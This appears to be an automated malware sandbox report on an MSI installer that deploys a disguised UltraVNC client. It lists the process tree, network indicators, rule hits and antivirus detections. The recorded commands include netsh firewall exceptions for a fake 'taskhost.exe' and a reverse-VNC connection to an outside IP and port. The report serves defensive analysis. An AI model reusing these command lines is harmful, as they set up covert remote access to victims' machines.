Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 21, 2025, 10:23 a.m. | April 21, 2025, 12:24 p.m. |
-
msiexec.exe "C:\Windows\System32\msiexec.exe" /I C:\Users\test22\AppData\Local\Temp\Software-MSI.msi
2592 -
-
viewer.exe "C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd"
2916 -
-
cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
2072 -
cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
2116-
reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
152
-
-
WMIC.exe wmic process where (name="taskhost.exe") get commandline
2228 -
findstr.exe findstr /i "taskhost.exe"
2260 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://us1.discourse-cdn.com/flex019/uploads/manager1/original/2X/4/40a86b146f0d5eca2a51907256327ed2524cdf02.png
2612-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208
2900 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
284
-
-
viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
2776 -
timeout.exe timeout /t 1
2876 -
taskkill.exe taskkill /im rundll32.exe /f
2244 -
timeout.exe timeout /t 2
2944 -
taskkill.exe taskkill /im rundll32.exe /f
300 -
timeout.exe timeout /t 2
1852 -
taskkill.exe taskkill /im rundll32.exe /f
2792 -
timeout.exe timeout /t 2
1864
-
-
-
mode.com Mode 90,20
2084 -
cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
2212 -
cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
1528-
reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
2396
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
2184 -
-
mode.com Mode 90,20
2848 -
netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
3028 -
netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
2392 -
WMIC.exe wmic process where (name="taskhost.exe") get commandline
2756 -
findstr.exe findstr /i "taskhost.exe"
2400 -
taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5533368 -connect 86.54.42.29:5500 -run
2236
-
-
viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
2268 -
timeout.exe timeout /t 20
604 -
timeout.exe timeout /t 20
3764 -
timeout.exe timeout /t 20
3468 -
timeout.exe timeout /t 20
3676
-
-
cmd.exe cmd /c ""C:\Games\once.cmd" "
1976
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
86.54.42.29 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\2612-1745198644343750.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\548ac076-5da7-47a7-9994-548a341db157.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6805EDF0-A34.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63327DF3-A54.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
file | C:\Games\cmmc.cmd |
cmdline | C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" |
cmdline | C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul |
cmdline | wmic process where (name="taskhost.exe") get commandline |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe") |
url | http://java.sun.com/products/plugin/index.html |
url | http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab |
url | http://www.uvnc.com |
url | http://forum.uvnc.com |
url | https://crashpad.chromium.org/bug/new |
url | https://crashpad.chromium.org/ |
url | https://clients4.google.com/invalidation/android/request/ |
url | http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0 |
url | http://services.ukrposhta.com/postindex_new/ |
url | http://dts.search-results.com/sr?lng= |
url | http://inposdom.gob.do/codigo-postal/ |
url | http://creativecommons.org/ns |
url | http://www.postur.fo/ |
url | https://qc.search.yahoo.com/search?ei= |
url | https://cacert.omniroot.com/baltimoreroot.crt09 |
url | http://crbug.com/122474. |
url | https://search.yahoo.com/search?ei= |
url | http://t1.symcb.com/ThawtePCA.crl0/ |
url | http://crbug.com/31395. |
url | https://support.google.com/chrome/answer/165139 |
url | http://crbug.com/320723 |
url | https://datasaver.googleapis.com/v1/clientConfigs |
url | http://crl.starfieldtech.com/sfroot-g2.crl0L |
url | https://ct.startssl.com/ |
url | https://suggest.yandex.com.tr/suggest-ff.cgi?part= |
url | https://de.search.yahoo.com/favicon.ico |
url | https://github.com/GoogleChrome/Lighthouse/issues |
url | http://www.searchnu.com/favicon.ico |
url | https://support.google.com/installer/?product= |
url | http://msdn.microsoft.com/en-us/library/ms792901.aspx |
url | https://www.najdi.si/search.jsp?q= |
url | http://x.ss2.us/x.cer0 |
url | http://crl.geotrust.com/crls/gtglobal.crl04 |
url | https://accounts.google.com/ServiceLogin |
url | https://accounts.google.com/OAuthLogin |
url | https://c.android.clients.google.com/ |
url | https://www.google.com/tools/feedback/chrome/__submit |
url | https://chrome.google.com/webstore/category/collection/dark_themes |
url | http://check.googlezip.net/generate_204 |
url | http://ocsp.starfieldtech.com/08 |
url | http://www.guernseypost.com/postcode_finder/ |
url | http://crl.certum.pl/ca.crl0h |
url | http://ator |
url | https://suggest.yandex.by/suggest-ff.cgi?part= |
url | http://feed.snap.do/?q= |
url | https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico |
url | http://www.language |
url | https://support.google.com/chrome/ |
url | http://developer.chrome.com/apps/declare_permissions.html |
url | http://www.google.com/chrome/intl/ko/eula_text.html |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Remote Administration toolkit VNC | rule | RAT_VNC | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Check if hotfix are applied | rule | check_patchlevel | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Install itself for autorun at Windows startup | rule | Persistence | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal |
cmdline | C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description |
cmdline | netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL |
cmdline | netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL |
cmdline | Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description |
cmdline | wmic process where (name="taskhost.exe") get commandline |
cmdline | taskkill /im rundll32.exe /f |
buffer | Buffer with sha1: 7f28d5a55ad8d5df516d23d7573238da11d72c4d |
buffer | Buffer with sha1: 73c69d167a496e6b1ce71a13e9e9596404cb72dd |
host | 86.54.42.29 |
file | C:\Games\cmmc.cmd |
process: potential process injection target | explorer.exe |
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208 | ||||||
parent_process | chrome.exe | martian_process | "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1160,10399697192018759172,2665692538915347063,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=F70E699DB89A5523589750F744F55B43 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2 |
url | http://127.0.0.1 |
mutex | WinVNC_Win32_Instance_Mutex |
Lionic | Riskware.Win32.GenericFCA.1!c |
CTX | msi.trojan.winvnc |
CAT-QuickHeal | BAT.Trojan.48572.GC |
ALYac | Trojan.GenericKD.69894605 |
VIPRE | Application.GenericFCA.7 |
K7GW | Trojan ( 005ae24c1 ) |
K7AntiVirus | Trojan ( 005ae24c1 ) |
Arcabit | Application.GenericFCA.7 [many] |
ESET-NOD32 | multiple detections |
Avast | Other:Malware-gen [Trj] |
Cynet | Malicious (score: 99) |
Kaspersky | not-a-virus:HEUR:RemoteAdmin.Win32.UltraVNC.gen |
BitDefender | Application.GenericFCA.7 |
Emsisoft | Application.GenericFCA.7 (B) |
F-Secure | PrivacyRisk.SPR/RemoteAdmin.vtoyf |
Zillya | Tool.UltraVNC.Win32.468 |
Sophos | Troj/Agent-BKTZ |
FireEye | Application.GenericFCA.7 |
Detected | |
Avira | SPR/RemoteAdmin.vtoyf |
Antiy-AVL | Trojan/Win32.WinVNC-based |
GData | Trojan.GenericKD.69894567 |
Varist | ABRisk.RXAD-0 |
McAfee | Artemis!F66E9F35B07A |
Ikarus | Trojan.Win32.Winvnc |
Tencent | Bat.Trojan.Agent.Yfow |
Fortinet | W32/WinVNC_based.AD!tr |
AVG | Other:Malware-gen [Trj] |
alibabacloud | Trojan:Win/WinVNC-based.AF |
dead_host | 86.54.42.29:5500 |